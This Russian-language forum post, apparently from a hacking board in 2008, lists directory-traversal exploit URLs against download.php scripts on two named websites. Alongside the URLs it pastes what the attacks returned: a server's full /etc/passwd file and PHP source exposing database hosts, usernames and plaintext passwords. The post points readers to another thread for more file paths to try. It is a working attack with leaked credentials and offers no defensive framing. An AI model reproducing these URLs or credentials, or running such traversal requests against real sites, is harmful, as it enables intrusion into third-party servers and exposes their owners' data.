Показать сообщение отдельно

  #10  
Старый 28.06.2008, 02:08
b3
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
С нами: 11278406

Репутация: 818


По умолчанию

1) http://www.ejls.eu/download.php?file=../etc/passwd

Цитата:
root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/log:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
operator:x:11:0perator:/root:/bin/bash
games:x:12:100:games:/usr/games:
ftp:x:14:50::/home/ftp:
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
pop:x:90:90:POP:/:
nobody:x:99:99:nobody:/:
Сколько не мучался пути к конфигам ненашел, пути брал отсюда:
https://forum.antichat.ru/thread49775.html

2) http://www.jff.org/download.php?file=../index.php
Цитата:
$hostname_JFF = "localhost";
$database_JFF = "jff_content";
$username_JFF = "jff_contentReade";
$password_JFF = "^&%623kjlfsdf_$43";
и
Цитата:
<?php
function connectToDatabase() {
$dbh=mysql_connect ("localhost", "helpuc_helpuc2hu", "xd1iqXSO9m")
or die ('I cannot connect to the database because: ' . mysql_error());
mysql_select_db ("helpuc_helpuc2helpuconnect");
}
function query ($sql)
{
$query_result=mysql_query($sql) or die("Couldn't execute following query:<b>".$sql."</b> because of".mysql_error());
if (!$query_result) return (0);
$out=array();
// if (mysql_num_rows($query_result)>1) {
while ($value=@mysql_fetch_array($query_result,MYSQL_ASS OC)) $out[]=$value;
//} else $out=@mysql_fetch_array($query_result,MYSQL_ASSOC) ;
if (count ($out)>=1) return ($out);else return $query_result;
}
?>
 
Ответить с цитированием